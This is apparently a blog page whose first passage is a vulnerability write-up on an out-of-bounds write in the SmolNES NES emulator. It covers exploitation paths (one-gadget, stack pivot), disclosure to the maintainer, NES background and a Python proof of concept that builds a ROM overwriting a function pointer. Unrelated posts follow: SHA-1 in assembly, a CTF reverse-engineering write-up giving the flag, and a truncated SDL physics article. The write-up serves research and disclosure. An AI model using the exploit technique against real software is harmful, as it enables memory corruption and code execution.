A “one-gadget” is a gadget in libc that, when called, executes execve("/bin/sh", NULL, NULL) if certain register conditions are met. Pointing render_hook at this gadget would yield a shell without a ROP chain, provided a libc address leak is available to bypass ASLR. In a real-world context, the end goal is usually not a local shell but persistence or remote access; the one-gadget remains a valid tool, and only the post-exploitation action changes.

Option 2: Stack pivot into rombuf

The real alternative is a stack pivot: find a gadget that places rsp (the stack pointer) into a memory region whose contents we control. rombuf is a 1 MB array (fully controlled by the malicious ROM) located in .bss. A gadget of the form mov rsp, [address_in_bss] ; ret would pivot the stack into rombuf and allow executing an arbitrary ROP chain, leading to code execution. This scenario is reinforced by the fact that rom is a global pointer (in .bss) that already points into rombuf: a gadget dereferencing this known address is enough to place rsp in the controlled region.

10. Responsible Disclosure and CVE

Reporting to the maintainer

The vulnerabilities described in this write-up were reported to the project’s maintainer (binji/smolnes) by email before this article was published. His response, unsurprisingly for a code golf project, was that he “wasn’t too worried about OOB in smolnes”. He authorized me to publish this write-up.

Why no CVE was requested

These vulnerabilities technically meet the criteria for CVE assignment: they are reproducible, documented, and the impact (guaranteed DoS, memory corruption) is real.

However, filing a CVE would have been counterproductive in this case. SmolNES is a hobby code golf project with 3 contributors, designed as a compactness exercise and not intended for production deployment. There is no proven critical exploitation path in the binary as distributed (the GOT and heap are out of reach, no function pointer exists in the reachable region).

Given the nature of the project and the absence of a critical exploitation path, I decided not to pollute the ecosystem with a pointless CVE.

This aligns with what this article describes well: CVSS scores are calculated for the worst-case deployment scenario, regardless of actual context. The author himself acknowledges that some CVEs “have no viable exploitation path or deployment, and frankly waste everyone’s time.” A hobby NES emulator is the perfect example.

11. Appendix: Required NES concepts

This appendix covers the NES architectural concepts required to understand the vulnerability.

A. NES general architecture

The NES (Nintendo Entertainment System, first released in Japan in 1983 as the Famicom) is made up of three main components:

CPU: a Ricoh 2A03, derived from the MOS Technology 6502. 8-bit processor, 16-bit address bus (64 KB address space).
PPU (Picture Processing Unit): the Ricoh 2C02, handles display. It has its own 16 KB address space, separate from the CPU’s.
APU (Audio Processing Unit): integrated into the CPU, handles sound (5 channels).

The game is stored on a cartridge containing two types of memory:

PRG-ROM: the game code and program data (read by the CPU via $8000-$FFFF)
CHR-ROM or CHR-RAM: the graphics data (tiles, sprites), accessed by the PPU

B. The 6502 CPU and its address space

The CPU addresses 64 KB (0x0000 to 0xFFFF), broken down as follows:

$0000 - $07FF : Internal RAM (2 KB, mirrored over $0000-$1FFF)
$2000 - $2007 : PPU registers (mirrored across the entire $2000-$3FFF range)
$4000 - $4017 : APU and I/O registers (joypads, DMA)
$6000 - $7FFF : PRG-RAM (optional cartridge RAM)
$8000 - $FFFF : PRG-ROM (game code) + Mapper registers

The Reset Vector: when the NES powers on, the CPU reads the two bytes at $FFFC-$FFFD and jumps to the address they contain. That’s the game’s entry point.

6502 instructions relevant to the vulnerability:

LDA #val (opcode A9): loads an immediate value into accumulator A
STA $addr (opcode 8D + 2 little-endian bytes): writes A to absolute memory
INC $addr,X (opcode FE + 2 bytes): reads, increments, and writes back the memory value (Read-Modify-Write)

prg[] and memory windows:

prg is an array whose elements contain the number of a PRG bank currently mapped into CPU memory. A PRG bank is 16 KB. Example:

prg[0] = 2;  // the $8000-$BFFF range points to bank 2 of the ROM
prg[1] = 5;  // the $C000-$FFFF range points to bank 5 of the ROM
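As a simplified illustration of how such a window table turns a CPU address into a ROM offset, consider the sketch below. prg_offset is a hypothetical helper, not the SmolNES expression: it assumes two fixed 16 KB windows and leaves out the bank-count mask that the emulator applies.

```c
#include <assert.h>
#include <stdint.h>

/* Simplified model: two 16 KB windows, prg[0] for $8000-$BFFF and
 * prg[1] for $C000-$FFFF. Returns the byte offset into PRG-ROM. */
static uint32_t prg_offset(const uint8_t prg[2], uint16_t addr) {
  assert(addr >= 0x8000);
  uint8_t window = (addr >> 14) & 1; /* 0: $8000-$BFFF, 1: $C000-$FFFF */
  return (uint32_t)prg[window] << 14 | (addr & 0x3FFF);
}
```

With prg = {2, 5}, address $8000 lands at offset 0x8000 (start of bank 2) and $C000 at offset 0x14000 (start of bank 5).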

C. The PPU and VRAM

The PPU manages the display through its own 16 KB address space:

$0000 - $1FFF : Pattern Tables (CHR: 8x8 pixel tiles, 2 banks of 4 KB)
$2000 - $3EFF : Nametables (screen map)
$3F00 - $3FFF : Palette RAM (32 active colors)

Registers $2006 (PPUADDR) and $2007 (PPUDATA)

The CPU cannot directly access VRAM. It communicates with the PPU through memory-mapped registers in the $2000-$2007 range:

$2006 (PPUADDR): sets the target address in VRAM via two consecutive writes (toggle controlled by bit W):

First write  -> high byte of the address (stored in T, temporary register)
Second write -> low byte + copy of T into V (V = active address)

case 6: // $2006 PPUADDR
    T = (W ^= 1)
      ? T & 0xff | val % 64 << 8   // 1st write: bits 8-13 of T
      : (V = T & ~0xff | val);     // 2nd write: bits 0-7 of T, then V = T
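The same latch logic, unrolled into a small standalone model for readability. ppu_addr_latch and ppuaddr_write are names introduced for this sketch; the behavior follows the one-line expression above.

```c
#include <assert.h>
#include <stdint.h>

typedef struct {
  uint16_t t; /* temporary address register T */
  uint16_t v; /* active address register V */
  uint8_t  w; /* write toggle W */
} ppu_addr_latch;

/* Models one CPU write to $2006. */
static void ppuaddr_write(ppu_addr_latch *p, uint8_t val) {
  assert(p != 0);
  p->w ^= 1;
  if (p->w) {
    /* 1st write: bits 8-13 of T (the two top bits of val are dropped) */
    p->t = (uint16_t)((p->t & 0x00FF) | (val % 64) << 8);
  } else {
    /* 2nd write: bits 0-7 of T, then V takes the full address */
    p->t = (uint16_t)((p->t & ~0xFF) | val);
    p->v = p->t;
  }
}
```

Writing $12 then $34 leaves V at $1234; since the high byte is reduced modulo 64, V can never exceed $3FFF.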

$2007 (PPUDATA): reads or writes one byte at the address pointed to by V. After each access, V auto-increments:

V += ppuctrl & 4 ? 32 : 1;
V %= 16384;  // 16384 = 2^14: the PPU space is 14 bits wide (0 to 16383)

This auto-increment mechanism allows writing consecutive byte sequences to VRAM with only repeated STA $2007 instructions.

D. Mappers

The CPU address space only leaves 32 KB for PRG-ROM, and the PPU only 8 KB for CHR. But some games need much more (Super Mario Bros. 3 ships 384 KB of ROM in total: 256 KB of PRG and 128 KB of CHR).

The solution: Mappers, extra chips inside the cartridge that enable bank switching. The CPU always sees the same addresses ($8000-$FFFF), but the Mapper can connect different chunks of the ROM to those addresses.

How the game controls the Mapper: writes to the ROM region ($8000-$FFFF) do not modify the ROM (read-only). This behavior is repurposed: writes are intercepted and interpreted as bank switching commands. This is Memory-Mapped I/O (MMIO).

In SmolNES, the Mapper number is encoded in bits 4-7 of iNES header byte 6 (rombuf[6] >> 4).

E. CHR-ROM vs CHR-RAM

CHR-ROM: most games store their graphics in a dedicated ROM chip on the cartridge. Graphics are fixed. chrrom points into the ROM file buffer.

CHR-RAM: some games (such as The Legend of Zelda and Metroid) have no CHR-ROM chip. The cartridge carries 8 KB of RAM instead, which the game fills and modifies at runtime, allowing dynamic graphics. chrrom then points to chrram[8192].

In SmolNES, header byte 5 (rombuf[5]) determines the mode:

chrrom = rombuf[5] ? rom + (rombuf[4] << 14) : chrram;
//       ^if != 0: CHR-ROM from the file       ^if 0: CHR-RAM (static 8 KB)

This distinction is at the heart of the vulnerability: Mappers allow selecting among multiple CHR banks. In CHR-ROM mode, having multiple banks is normal: the ROM file can contain many. But in CHR-RAM mode, there are only 2 physical 4 KB banks (0 and 1, i.e. 8 KB in total). Selecting bank 2 or higher goes past the end of chrram[8192].

F. Mapper 3 (CNROM)

Mapper 3, also known as CNROM, is one of the simplest. It only manages the CHR bank. Any write to $8000-$FFFF changes the active graphics bank:

case 3: // mapper 3 (CNROM)
    chr[0] = val % 4 * 2;   // val % 4 gives 0, 1, 2, or 3; * 2 gives 0, 2, 4, or 6
    chr[1] = chr[0] + 1;    // Next bank: 1, 3, 5, or 7
    break;

// CHR bank is selected in pairs (two 4 KB sub-banks)
// Bank 0: chr[0]=0, chr[1]=1  (offsets 0 and 4096 into chrram -> valid)
// Bank 1: chr[0]=2, chr[1]=3  (offsets 8192 and 12288          -> OVERFLOW if CHR-RAM)
// Bank 2: chr[0]=4, chr[1]=5  (offsets 16384 and 20480         -> even further)
// Bank 3: chr[0]=6, chr[1]=7  (offsets 24576 and 28672         -> maximum range)

In CHR-ROM mode, all these offsets are valid as long as the ROM file actually contains four 8 KB CHR banks. In CHR-RAM mode, only offsets 0 and 4096 (bank 0) are valid.
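To make the bounds problem concrete, the sketch below recomputes the offsets from the comment block above and compares them with the size of chrram. It is an illustration in Python rather than SmolNES code; the helper name mapper3_offsets is hypothetical.

```python
CHRRAM_SIZE = 8192     # size of the static chrram buffer
SUB_BANK_SIZE = 4096   # each chr[] entry selects a 4 KB window


def mapper3_offsets(val):
    """Byte offsets selected by a Mapper 3 write of `val` (hypothetical helper)."""
    chr0 = val % 4 * 2
    chr1 = chr0 + 1
    return chr0 * SUB_BANK_SIZE, chr1 * SUB_BANK_SIZE


for val in range(4):
    low, high = mapper3_offsets(val)
    last_byte = high + SUB_BANK_SIZE - 1
    status = "in bounds" if last_byte < CHRRAM_SIZE else "out of bounds"
    print(f"val={val}: offsets {low} and {high} -> {status} for CHR-RAM")
```

Only val % 4 == 0 keeps both windows inside the 8 KB buffer; the three other values place them entirely past its end.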

G. The iNES file format

A .nes file begins with a 16-byte header:

Offset  Size  Description
0       4     "NES\x1A" (magic number)
4       1     Number of PRG-ROM banks (16 KB each)
5       1     Number of CHR-ROM banks (8 KB each). 0 = CHR-RAM mode
6       1     Flags:
                bit 0    : mirroring (0=horizontal, 1=vertical)
                bit 1    : battery (persistent PRG-RAM)
                bit 2    : trainer (512 bytes before PRG-ROM)
                bits 4-7 : low nibble of Mapper number
7       1     Flags:
                bits 4-7 : high nibble of Mapper number
8-15    8     Unused (base iNES format)

In SmolNES, these values are read from rombuf without validation and used directly to configure the emulator.
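As an illustration of the kind of check that is skipped, here is a hedged sketch of a header parser that validates the magic number and derives the file size the header implies. The function names parse_ines_header and expected_file_size are hypothetical, and combining both nibbles into the mapper number follows the table above rather than SmolNES, which only uses rombuf[6] >> 4.

```python
def parse_ines_header(data):
    """Parse the 16-byte iNES header into a dict (hypothetical helper)."""
    if len(data) < 16 or data[0:4] != b"NES\x1a":
        raise ValueError("not an iNES file")
    flags6, flags7 = data[6], data[7]
    return {
        "prg_banks": data[4],                        # 16 KB each
        "chr_banks": data[5],                        # 8 KB each
        "chr_ram": data[5] == 0,                     # 0 banks means CHR-RAM
        "vertical_mirroring": bool(flags6 & 0x01),
        "battery": bool(flags6 & 0x02),
        "trainer": bool(flags6 & 0x04),
        "mapper": (flags7 & 0xF0) | (flags6 >> 4),   # high nibble | low nibble
    }


def expected_file_size(info):
    """File size implied by the header fields, in bytes."""
    trainer = 512 if info["trainer"] else 0
    return 16 + trainer + info["prg_banks"] * 16384 + info["chr_banks"] * 8192


# Same header values as the PoC ROM: 1 PRG bank, CHR-RAM, Mapper 3
header = bytes([0x4E, 0x45, 0x53, 0x1A, 1, 0, 0x30, 0]) + bytes(8)
info = parse_ines_header(header)
print(info["mapper"], info["chr_ram"], expected_file_size(info))
```

A loader could compare expected_file_size with the actual file length before using any of the fields as offsets.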

12. Resources

PoC script for modified binary

#!/usr/bin/env python3
"""
PoC ROM for smolnes: OOB Write via Mapper 3 CHR-RAM -> overwrite render_hook.

.bss layout (smolnes/deobfuscated binary compiled with poc_hook.c as second source):
  chrram      : offset 0       (8192 bytes)
  render_hook : offset 18552   (8 bytes, uint8_t*)

Parameters:
  - Mapper 3 active (rombuf[6] >> 4 == 3)
  - CHR-RAM mode (rombuf[5] == 0) => chrrom = chrram
  - val=2 written to $8000 => chr[0] = 2%4*2 = 4
  - V = 0x0878 (via two $2006 writes)
  - get_chr_byte(0x0878) = &chrram[chr[0]*4096 + 0x878] = &chrram[18552] = &render_hook

Target: write 0xDEADBEEF into render_hook (little-endian, 8 bytes).
Trigger: when scany==241, dot==1, smolnes calls render_hook() => SIGSEGV.
"""

TARGET_ADDR = 0xDEADBEEF

# ---- Parameter calculation ----
CHRRAM_SIZE   = 8192
HOOK_OFFSET   = 18552                # p/d (long)&render_hook - (long)&chrram
BANK_INDEX    = HOOK_OFFSET // 4096  # = 4 (chr[0] to reach)
INTRA_OFFSET  = HOOK_OFFSET % 4096  # = 2168 = 0x878

assert BANK_INDEX in [2, 4, 6], f"Bank {BANK_INDEX} not reachable with Mapper 3 (val%4*2)"
MAPPER_VAL = BANK_INDEX // 2        # val such that val%4*2 = BANK_INDEX => val = BANK_INDEX/2

# V = INTRA_OFFSET: it must stay in $0000-$0FFF so the access is routed through chr[0]
V = INTRA_OFFSET  # 0x878

V_HIGH = (V >> 8) & 0x3F            # high byte for $2006 (6 bits)
V_LOW  = V & 0xFF                   # low byte for $2006

TARGET_BYTES = TARGET_ADDR.to_bytes(8, 'little')

print(f"[*] render_hook offset from chrram: {HOOK_OFFSET} (0x{HOOK_OFFSET:04X})")
print(f"[*] Bank index: {BANK_INDEX} => mapper write val={MAPPER_VAL} to $8000")
print(f"[*] V = 0x{V:04X} => $2006 writes: 0x{V_HIGH:02X} then 0x{V_LOW:02X}")
print(f"[*] Target: 0x{TARGET_ADDR:016X}")
print(f"[*] Little-endian bytes: {TARGET_BYTES.hex()}")

# ---- 6502 code construction ----
code = bytearray()

def nop():
    return bytes([0xEA])

def lda_imm(val):
    return bytes([0xA9, val])

def sta_abs(addr):
    return bytes([0x8D, addr & 0xFF, addr >> 8])

def jmp_abs(addr):
    return bytes([0x4C, addr & 0xFF, addr >> 8])

# Step 1: Mapper 3, write to $8000 to set chr[0] = BANK_INDEX
code += lda_imm(MAPPER_VAL)
code += sta_abs(0x8000)

# Step 2: set V via two consecutive writes to $2006
code += lda_imm(V_HIGH)
code += sta_abs(0x2006)
code += lda_imm(V_LOW)
code += sta_abs(0x2006)

# Step 3: write the 8 bytes of TARGET_ADDR via $2007
# get_chr_byte(V) => &chrram[HOOK_OFFSET] = &render_hook
# V auto-increments by 1 after each access => consecutive writes
for byte in TARGET_BYTES:
    code += lda_imm(byte)
    code += sta_abs(0x2007)

# Infinite loop (NOP + JMP) to let the PPU advance to scany==241
nop_offset = len(code)
code += nop()                            # NOP
code += jmp_abs(0x8000 + nop_offset)     # JMP back to NOP

print(f"[*] Code size: {len(code)} bytes (starts at $8000)")
print(f"[*] NOP loop at $8000+{nop_offset} = $" + f"{0x8000+nop_offset:04X}")

# ---- iNES ROM construction ----
PRG_SIZE = 16384  # 1 PRG bank = 16 KB

# iNES header (16 bytes)
header = bytearray(16)
header[0:4] = b'NES\x1a'
header[4] = 1         # 1 PRG bank (16 KB)
header[5] = 0         # 0 CHR banks => CHR-RAM mode
header[6] = 0x30      # Mapper 3 (high nibble = 3), horizontal mirroring
# bytes 7-15 = 0x00

# PRG ROM: filled with NOPs (0xEA), code at the start, reset vector at the end
prg = bytearray(nop() * PRG_SIZE)

# Code at offset 0 ($8000)
prg[0:len(code)] = code

# Reset vector at $FFFC-$FFFD (offset 0x3FFC in PRG): points to $8000
prg[PRG_SIZE-4] = 0x00   # low byte of $8000
prg[PRG_SIZE-3] = 0x80   # high byte of $8000

rom = bytes(header) + bytes(prg)

output_path = "poc_deadbeef.nes"
with open(output_path, "wb") as f:
    f.write(rom)

print(f"\n[+] ROM written: {output_path} ({len(rom)} bytes)")
print(f"[+] Run: ./smolnes/deobfuscated {output_path}")
print(f"[+] Expected: SIGSEGV / call to 0x{TARGET_ADDR:X} after ~1 PPU frame")

References

NESDev Wiki: the definitive resource for NES technical details
NesHacker playlist: excellent explanations of NES internals

SHA-1 from scratch in assembly

Nov 23, 2025

Where does this project come from?

During my second year of studies, as part of an assembly course, I had the opportunity to set myself a challenge: build a simple, secure authentication system that lets a user log in to a fictional application. The most interesting part of the project was the secure handling of passwords, which meant implementing a hashing algorithm.

For this I went with SHA-1. Although it is considered cryptographically obsolete today, it remains algorithmically close to its successor SHA-2 (which is still considered secure to this day) while being less complex to implement, and without being as laughably weak as MD5.

Methodology

My approach for this project went through three key steps:

Theoretical understanding: to grasp the algorithm conceptually, I relied on this Brilliant page, which rigorously explains how the algorithm works from a mathematical point of view.
Prototyping: starting from a blank page and converting the algorithm directly from theory to assembly is a difficult task. To create an intermediate step, I started from a reference JavaScript implementation. From there, I used ChatGPT as an assistant to translate the logic into C. The goal was to quickly get code “close to the machine” that manipulated bytes and words directly, so as to have a clear model before going down to the register level.
Conversion to assembly: this step was the core of the project. I translated the program’s logic from C to assembly, inevitably running into unexpected challenges that went well beyond simple translation.

Demonstration

Here is a text hashed with my implementation:

And the same text hashed on an online site:

An interesting technical point: hexadecimal values vs. their representation

Writing a program like this with no abstraction layer sometimes confronts us with unexpected problems that higher-level languages usually handle implicitly.

For example, the algorithm produces a hash of the input, which is displayed as a hexadecimal representation of the values actually used in the computation (and therefore present in memory).
To make this clear, note that the value 0x11 is stored in memory as is (a single byte, 0x11), but its textual representation is stored as two '1' characters, each with the ASCII value 0x31. So the representation of the value 0x11 in memory is the two bytes 0x31 0x31 when it has to be displayed as ASCII.

An extra conversion step is therefore needed at the end of the algorithm. In C, this is usually handled by the formatting functions:

// h0 - h4 are raw numeric values
// each "%08x" tells sprintf to perform the conversion discussed above
sprintf(output, "%08x%08x%08x%08x%08x", h0, h1, h2, h3, h4);

Reimplementing this behavior in assembly was an excellent exercise in string manipulation at the lowest level.
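The conversion can be sketched as a nibble-by-nibble table lookup. The Python below is only an illustration of the idea, not the assembly from the project; the helper name word_to_hex_ascii and the lookup table HEX_DIGITS are assumptions of this sketch.

```python
HEX_DIGITS = b"0123456789abcdef"   # ASCII codes of the 16 hex digits


def word_to_hex_ascii(word):
    """Convert a 32-bit value to its 8 ASCII hex characters (hypothetical helper)."""
    out = bytearray()
    for shift in range(28, -4, -4):        # most significant nibble first
        nibble = (word >> shift) & 0xF     # isolate 4 bits
        out.append(HEX_DIGITS[nibble])     # table lookup yields the ASCII code
    return bytes(out)


text = word_to_hex_ascii(0x00000011)
print(text, text[-2:].hex())
```

The last two bytes of the result are 0x31 0x31, the ASCII form of the value 0x11 discussed above. In assembly, the same loop becomes a shift, a mask and an indexed load per nibble.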

Limitations

My implementation works correctly for inputs of up to 31 characters. Beyond that, the hash it produces diverges from the reference.

I only discovered this limit after the fact, and since I have not gone back into the code I cannot say where the error comes from. The fact that the limit sits at 31 characters is nonetheless suspicious: 32 characters = 256 bits, which suggests a buffer problem or an off-by-one at that boundary.

You will find the source code in the following repository:

GitHub

Hack'in 2025 - Reverse - Animal Fabuleux

Jun 15, 2025

This write-up was written “in the heat of the moment” shortly after the event in June 2025. I chose to leave it in its original state so that it serves as a faithful snapshot of my level of understanding at that precise time.

With hindsight and the experience gained since, I now notice some terminological approximations. For example, in the analysis I refer to a memory region mapped for instructions as a “Stack 2”, when it would be technically more accurate to speak of a .text section or a code segment.

Despite these imperfections, the goal of this article remains to write the write-up I would have liked to read had I been stuck on this challenge. I therefore favored a pedagogical approach and a transcription of my thought process, even if that lets my imprecisions of the time show through.
It also leaves a trace that lets me come back and see how far I have come.

Achievement: First Blood on this challenge during the event!

Provided file: animal_fabuleux

The goal is to find the right argument (flag) to pass to this program.

Analysis

A first file command tells us we are dealing with a 64-bit ELF binary.

~/Downloads/Hackin  file animal_fabuleux
animal_fabuleux: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=703e8337a1f696300ff09ab3426e26afa98bda38, for GNU/Linux 3.2.0, stripped

I also notice that it is stripped, which will make the work a little less pleasant, but that remains a minor inconvenience.

Next, running strings filtered through | grep flag reveals the following strings:

~/Downloads/Hackin  strings animal_fabuleux |grep flag
wrong flag
well done! you can use this flag to validate the challenge: HNx04{%s}
Usage: %s <flag>

Finally, before starting the disassembly, I try to run the program and get this error:

~/Downloads/Hackin  ./animal_fabuleux blablabla
./animal_fabuleux: error while loading shared libraries: libunicorn.so.2: cannot open shared object file: No such file or directory

This gives us a huge hint: the program uses a library named Unicorn.
After a quick Google search, I learn what Unicorn is: “Unicorn is a lightweight multi-platform, multi-architecture CPU emulator framework.”

My first reaction was “Uh-oh, trouble”, and I thought about switching to another challenge. But I decided not to let its intimidating aura discourage me.

After installing the library, here is the program’s output:

~/Downloads/Hackin  ./animal_fabuleux testaaa
wrong flag

I noticed a delay between launching the program and the “wrong flag” message, which is probably an anti-bruteforce measure.
Moreover, if we find the right flag we can expect the returned string to be: well done! you can use this flag to validate the challenge: HNx04{whatIEntered}, as we saw in the strings output.

Takeaway:

Stripped binary, no useful symbols
The flag has the format HNx04{%s}
A CPU emulation library is used (Unicorn)

Disassembly

After loading the program into Binary Ninja, I find that most of the logic takes place in the main function. It breaks down into 3 parts:

Context check
Initialization
Main logic loop

Context check

Figure: main function, context check

The program requires exactly two arguments (its own name, then the flag).
It then waits one second (the anti-bruteforce measure)
and checks whether argument 1 (our flag) is exactly 8 characters long. If not, the function sub_4011d9 (which, after inspection, prints the string wrong flag) is called and the program exits.
We can therefore rename sub_4011d9 to showFailText and move on.

Takeaway: the flag is 8 characters long

Initialization

Here we spot several calls to functions starting with uc_. Tracing them back to their definitions, we see that they are external functions: they are certainly the functions coming from Unicorn (UC).

Not having found explicit documentation for these functions, I fell back on the tutorial on the official Unicorn website, which gives an overview of how these functions are used. From that I deduced the purpose of each of them and the meaning of their parameters.

uc_open
uc_mem_map
uc_mem_write
uc_emu_start
uc_mem_read (not present in the example)

Let’s take these functions one by one:

uc_open

We see that uc_open takes an architecture parameter, a mode parameter, and a pointer to (presumably) a uc_engine structure.

In the unicorn.h file available on GitHub, we can see the values associated with these flags.

In our case, the call was uc_open(2, 0, &var_20), which corresponds to uc_open(UC_ARCH_ARM64, UC_MODE_ARM, &var_20).
The mode could also be UC_MODE_LITTLE_ENDIAN, which has the same value 0 in unicorn.h, so it amounts to the same thing if ARM uses little endian by default.

Takeaway: the emulated processor uses the ARM64 (AArch64) architecture.

uc_mem_map / uc_mem_write

uc_mem_map appears to define a memory range usable for the CPU emulation, while uc_mem_write appears to write a number of bytes at a given address. So we have two functions for manipulating the data written into the virtual memory.

With this information, we can rename and retype the variables to see things more clearly:

What this code does, then, is initialize the virtual CPU emulation with two memory regions. The first runs from address 0x1000 to 0x1400 (let’s call it stack 1), and the second extends from 0x4000 to 0x104000 (let’s call it stack 2). The latter receives a sequence of instructions, in the form of opcodes that we can find in the program’s static memory.

Finally, there is also a mysterious constant initialized with the value 0x4c53, which I therefore named someConstant_4c53.

Takeaway:

Two virtual memory regions are set up:
0x1000 - 0x1400 -> region for data
0x4000 - 0x104000 -> region for code
A constant that is unused for now exists; its value is 0x4c53

Main logic loop

At this point in the disassembly, a few variables remain to be worked out:

sub_4011ef -> function that prints the flag, so this is the code we are aiming for
var_c_1 -> seems to be a counter incremented on each pass through the loop; if we manage to make it greater than or equal to 2, we get the flag
rax_35 -> clearly stores an error code
var_30 -> most likely a boolean; it must be false so that we do not leave the loop and var_c_1, which gives us the flag, gets incremented
data_40210f -> contains two null bytes
var_11_1 -> seems perfectly useless

Before moving on to the interpretation, let’s rename the variables for clarity:

So what does this part of the program do? To get the flag, we must go through the while loop at least twice without hitting the break, so that counter >= 2 is true and the flag is printed. To do so we must, as mentioned, avoid the break in the if (isWrongFlag), and this variable is set by reading what is at address 0x1005 in our virtual stack (stack 1).

From there, we need to understand what happens inside the virtual CPU to determine how to keep isWrongFlag at false.

First of all, the while loop itself only manipulates stack 1. This makes sense, because stack 2 is reserved for instructions and must therefore not be modified.

The first mem_write writes 4 characters at address 0x1000, taken from our argv[1] (our flag passed as an argument). These 4 characters are selected with an offset of counter * 4: offset 0 on the first pass, and offset 4 on the second. In other words, if we pass the flag 12345678 to our program, the string 1234 is written at address 0x1000 when counter is 0 (first execution of the while loop), then 5678 is written when counter == 1.

The second mem_write writes 1 byte at address 0x1004 (right after the 4 characters above), taken from the address of someConstant (+ counter), whose value is 0x4c53. Since this system is little endian and we write only one byte, 0x53 alone is read first. Then, once counter is 1, the address someConstant + 1 points to 0x4c.

Finally, the third mem_write writes a null byte (0x00) at address 0x1005, to reset the flag-validity boolean in the virtual stack.
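The three writes can be replayed outside the emulator to see what the data region contains before each emulation run. This is a minimal sketch that uses a plain bytearray in place of Unicorn memory; the names data, BASE and prepare_iteration are hypothetical, and the flag 12345678 is the example used above.

```python
flag = b"12345678"                     # example argument from the text
key = (0x4C53).to_bytes(2, "little")   # someConstant as laid out in memory: 53 4c
BASE = 0x1000                          # start of the data region ("stack 1")
data = bytearray(0x400)                # stand-in for the region 0x1000-0x1400


def prepare_iteration(counter):
    """Replay the three mem_write calls for one pass of the loop."""
    data[0x1000 - BASE:0x1004 - BASE] = flag[counter * 4:counter * 4 + 4]
    data[0x1004 - BASE] = key[counter]   # one key byte per pass
    data[0x1005 - BASE] = 0x00           # reset the "wrong flag" boolean
    return bytes(data[0:6])


for counter in range(2):
    print(counter, prepare_iteration(counter).hex())
```

Each pass leaves four flag characters, one key byte and a cleared result byte at 0x1000 through 0x1005, which is everything the emulated code gets to see.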

Lastly, uc_emu_start is called and starts the emulation under these conditions, using the data placed in the stack so far.

We now know all the ins and outs. The only thing left to understand in order to build a flag is what happens in the ARM processor’s instructions. That is where the key to cracking this challenge lies.

Reversing the virtual processor

Here is the list of opcodes written into stack 2 (the instruction region) of the virtual processor: 800082d200004039081400d10a0082d2940080524b0140396b01084a7f01007180000054250080d2a40082d2850000f9080900914a050091940600519f020071a1feff5400

Having never done any ARM before, I had to juggle between the online disassembler and documentation (with LLM assistance to speed up my understanding of the architecture’s subtleties) to translate the opcodes into understandable logic.

With Shell-Storm’s disassembler, we can specify our architecture and get back readable ARM assembly to work with:

To understand what this means, let’s try to translate it literally into pseudo-C:

We have a base, but it remains unclear, so after analyzing the meaning of my own code, here is the algorithm executed on the ARM CPU:

Thanks to this, we finally know that the mystery variable someConstant is used as an “encryption key”, and it lets us find the flag. Indeed, as we saw earlier, this algorithm is called twice, once for each half of our 8-character flag. And from this code we see that each letter of the flag must be equal to the key, with 2 added to that key on each pass, not forgetting that 5 is first subtracted from the key passed in.

So for the first 4 letters (key passed: 0x53): 0x53 - 0x5 = 0x4E -> (+0x2) = 0x50 -> (+0x2) = 0x52 -> (+0x2) = 0x54

Then for the next 4 letters (key passed: 0x4c): 0x4c - 0x5 = 0x47 -> (+0x2) = 0x49 -> (+0x2) = 0x4B -> (+0x2) = 0x4D

Our final theoretical flag is therefore \x4e\x50\x52\x54\x47\x49\x4b\x4d, which is equivalent to NPRTGIKM
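The derivation above can be checked with a few lines of Python. This is a sketch of the reasoning rather than the challenge’s code: expected_half is a hypothetical helper that applies the “subtract 5, then add 2 per character” rule described in the text.

```python
def expected_half(key_byte):
    """Four expected characters for one key byte (hypothetical helper)."""
    start = key_byte - 5                          # the key is first reduced by 5
    return bytes(start + 2 * i for i in range(4)) # then grows by 2 per character


key = (0x4C53).to_bytes(2, "little")   # 0x53 is used first, then 0x4c
flag = b"".join(expected_half(k) for k in key)
print(flag.decode("ascii"))
```

The little-endian byte order matters here: using 0x4c first would swap the two halves of the flag.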

And there we go, GG!

Possible methodological improvements

It was only while writing this write-up that I came across the Unicorn Engine API Documentation, which contains a good amount of the information I would have needed to understand how this library’s functions work without having to deduce it from the tutorial.

That would have saved me time, but on the other hand, being forced to guess how the API works was an excellent exercise that strengthened my understanding of low-level logic.

Another possible improvement would have been to disassemble the opcode string itself with a tool that gives direct access to pseudo-C, allowing a quick understanding of that part.
However, having never done any ARM before, I think going the manual way was also an opportunity to learn about this architecture, which will save me time on future challenges. Going forward, I will need to use automated disassembly for speed, while knowing the architecture well enough to drop down to assembly and understand the subtleties when necessary.

Acknowledgements

Thanks to the whole Hack’in team for the event, and to the creator of this great challenge!
I have very fond memories of it and look forward to the next edition :)

(And thanks for the Wannacry fanny pack and the pins, haha)
Image: “Wannacry” pouch with “Hardcore” and “First Blood” pins

Building a physics system with SDL

Dec 28, 2024

This article looks at building physics-related behaviors (gravity, collisions, bounces) in the context of developing DuckDuckGame. It does not cover how objects are represented in space, only the physics applied to those objects.

Gravity

Creating gravity is very simple: at a regular time interval (each frame), the vertical speed of an object must increase. To do this, it is enough to have a variable representing that speed and add a fixed value to it, as in the following code:

speed += 0.2;
personnage->rect->y += speed;

And there we go! Our character falls.
Note that this approach depends on how many times per second this code runs: the more often it runs, the faster the fall. To compensate, we would need a variable holding the time elapsed since the last frame (known as DeltaTime) and multiply our speed increase by it (so that if the frame rate is high, the distance covered per frame is small, and vice versa).
However, obtaining such a number comes with its own technical challenges, which is why the rest of this document assumes a fixed frame rate.
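As a rough sketch of the DeltaTime idea (not code from DuckDuckGame), the Python below compares the per-frame update with a time-scaled one. The constant GRAVITY and both function names are hypothetical; GRAVITY is chosen so that the scaled version matches 0.2 per frame at 60 frames per second.

```python
GRAVITY = 0.2 * 60 * 60   # hypothetical: 0.2 px/frame^2 at 60 FPS, expressed in px/s^2


def fall_per_frame(duration, fps):
    """Frame-dependent update: same increment every frame, whatever the frame rate."""
    y = speed = 0.0
    for _ in range(round(duration * fps)):
        speed += 0.2
        y += speed
    return y


def fall_delta_time(duration, fps):
    """Time-scaled update: every increment is multiplied by the frame duration."""
    dt = 1.0 / fps            # DeltaTime, assumed constant in this sketch
    y = speed = 0.0
    for _ in range(round(duration * fps)):
        speed += GRAVITY * dt
        y += speed * dt
    return y


for fps in (30, 120):
    print(fps, fall_per_frame(1.0, fps), fall_delta_time(1.0, fps))
```

Over one second, the per-frame version covers a very different distance at 30 and 120 frames per second, while the time-scaled version stays within a few percent. The remaining gap comes from the integration step itself.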

Collisions

The first code used to handle collisions was this:

speed += 0.2;
if (personnage->rect->y >= 500) {
    personnage->rect->y = 500;
